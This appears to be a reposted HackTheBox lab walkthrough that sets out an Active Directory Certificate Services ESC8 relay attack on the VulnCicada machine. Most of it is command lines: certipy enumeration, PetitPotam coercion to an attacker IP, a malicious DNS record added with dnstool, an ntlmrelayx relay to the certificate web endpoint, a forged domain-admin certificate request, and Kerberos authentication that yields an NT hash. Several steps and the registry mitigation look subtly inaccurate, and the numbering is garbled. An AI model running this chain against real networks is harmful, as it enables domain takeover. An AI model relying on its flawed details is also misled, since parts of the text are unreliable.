Listen to this Post
Introduction
Active Directory Certificate Services (AD CS) vulnerabilities like ESC8 allow attackers to escalate privileges by abusing certificate templates. VulnCicada, HackTheBox’s fourth VulnLab machine, demonstrates this attack vector using PetitPotam and DNS tricks. This guide walks through the exploitation process from a Linux VM.
Learning Objectives
- Understand ESC8 (AD CS Relay Attack) exploitation
- Leverage DNS records for privilege escalation
- Use PetitPotam to force certificate requests
You Should Know
1. Enumerating Vulnerable Certificate Templates
Command:
certipy find -u user@domain -p Password123 -dc-ip 10.10.10.10
Steps:
- Identifies misconfigured certificate templates enabling enrollment without requiring authentication.
2. Output highlights templates with `ENROLLEE_SUPPLIES_SUBJECT` flag.
3. Confirms if `msPKI-Enrollment-Flag` contains `CT_FLAG_NO_SECURITY_EXTENSION`.
2. Forcing Authentication via PetitPotam
Command:
python3 PetitPotam.py -d domain -u user -p pass 10.10.10.10 attacker_ip
Steps:
- Triggers the target DC to authenticate to your attacker machine.
2. Requires NTLM relay listener setup (`ntlmrelayx.py`).
3. Exploits Windows’ MS-EFSRPC protocol coercion.
3. DNS Record Manipulation for Relay Attacks
Command:
dnstool.py -u domain\user -p pass -r vulnerable_record -a add -d attacker_ip 10.10.10.10
Steps:
- Adds a malicious DNS record pointing to your IP.
2. Ensures DC connections relay through your machine.
3. Requires `RPCDNS` privileges (often granted by default).
4. Capturing Relay with NTLM
Command:
ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support
Steps:
1. Listens for incoming authentication attempts.
- Forwards requests to AD CS web enrollment endpoints.
3. Issues fraudulent certificates for domain escalation.
5. Requesting Fraudulent Certificates
Command:
certipy req -ca 'CA-Name' -template 'Vulnerable-Template' -upn 'admin@domain' -dc-ip 10.10.10.10
Steps:
- Submits a certificate request using the relayed session.
2. Specifies high-privilege UPN (e.g., domain admin).
3. Saves `.pfx` file for later use.
6. Authenticating with Kerberos
Command:
certipy auth -pfx admin.pfx -dc-ip 10.10.10.10
Steps:
1. Converts certificate to Kerberos TGT.
2. Extracts NT hash for Pass-the-Hash attacks.
- Grants access to DC Sync or other privileged actions.
7. Mitigation: Disabling NTLM over HTTP
Command (Windows):
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\HTTP\Parameters" -Name "DisableNTLM" -Value 1
Steps:
1. Prevents NTLM relay via web endpoints.
2. Requires enabling Kerberos-only authentication.
3. Restart HTTP service after changes.
What Undercode Say
- Key Takeaway 1: ESC8 exploits often succeed due to default AD CS configurations lacking relay protections.
- Key Takeaway 2: DNS record manipulation bypasses network segmentation by redirecting DC traffic.
Analysis:
AD CS vulnerabilities represent a systemic issue in enterprise networks. While Microsoft patches specific coercion techniques (e.g., PetitPotam), architectural weaknesses persist. Red teams should prioritize certificate template audits, while blue teams must enforce EPA (Extended Protection for Authentication) and disable NTLM where possible. The VulnCicada machine exemplifies real-world attack chains combining multiple misconfigurations.
Prediction
AD CS attacks will dominate enterprise breach reports through 2025 as attackers shift from traditional Kerberos abuse to certificate-based persistence. Cloud-integrated hybrid environments may introduce new variants of these exploits. Proactive monitoring for anomalous certificate requests will become a baseline security requirement.
IT/Security Reporter URL:
Reported By: 0xdf Htb – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
